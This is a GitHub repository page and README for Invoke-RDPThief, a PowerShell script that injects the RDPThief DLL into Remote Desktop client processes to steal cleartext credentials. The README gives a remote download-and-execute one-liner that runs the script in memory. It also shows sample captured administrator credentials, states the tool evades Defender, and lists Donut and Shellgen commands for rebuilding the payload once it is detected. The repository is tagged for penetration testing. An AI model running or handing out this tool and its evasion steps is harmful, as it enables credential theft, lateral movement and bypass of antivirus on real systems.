https://github.com/the-viper-one/invoke-rdpthief
Inject RDPThief into memory with PowerShell.
- Host: GitHub
- URL: https://github.com/the-viper-one/invoke-rdpthief
- Owner: The-Viper-One
- Created: 2024-10-01T20:12:00.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2025-01-21T20:12:33.000Z (about 24 hours ago)
- Last Synced: 2025-01-21T20:30:05.237Z (about 23 hours ago)
- Topics: injection, lateral-movement, pentesting, powershell, rdp
- Language: PowerShell
- Homepage:
- Size: 217 KB
- Stars: 58
- Watchers: 1
- Forks: 8
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Invoke-RDPThief
This PowerShell script runs in a loop hunting for mstsc.exe processes. When any are found, the script performs process injection on the target process and injects RDPThief into it in order to capture cleartext credentials.
RDPThief.dll was converted to shellcode with Donut, then converted to UUIDs with Shellgen to hide the shellcode in plain sight within the script. The UUIDs are converted back into shellcode at runtime and injected while staying completely in memory.
- Works against Defender as of 01/10/2024
- Requires Administrative rights

## Usage

```powershell
# Load into memory and execute
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/Invoke-RDPThief/refs/heads/main/Invoke-RDPThief.ps1")
```

## Output

```
[*] Hunting for mstsc...
[+] Successfully injected into process 5496
[+] Extracted Credentials
Server : DC01.Security.local
Username : SECURITY\administrator
Password : Password123
```

## Payload creation
The payload in the script is ready to go; however, the steps below can be followed if the payload is signatured in the future.

Convert RDPThief.dll into shellcode with Donut:

```
.\donut.exe -f:1 --input:C:\RdpThief.dll -e 3 -b 1 -x 3 -k 2
```

Convert to UUID with Shellgen:

```powershell
Shellgen -RawFile "C:\loader.bin" -OutputFormat UUID
```

Take the output and place it into the $UUIDs array in Invoke-RDPThief.ps1.

RDPThief: https://github.com/0x09AL/RdpThief
Donut: https://github.com/TheWover/donut
Shellgen: https://github.com/Leo4j/ShellGen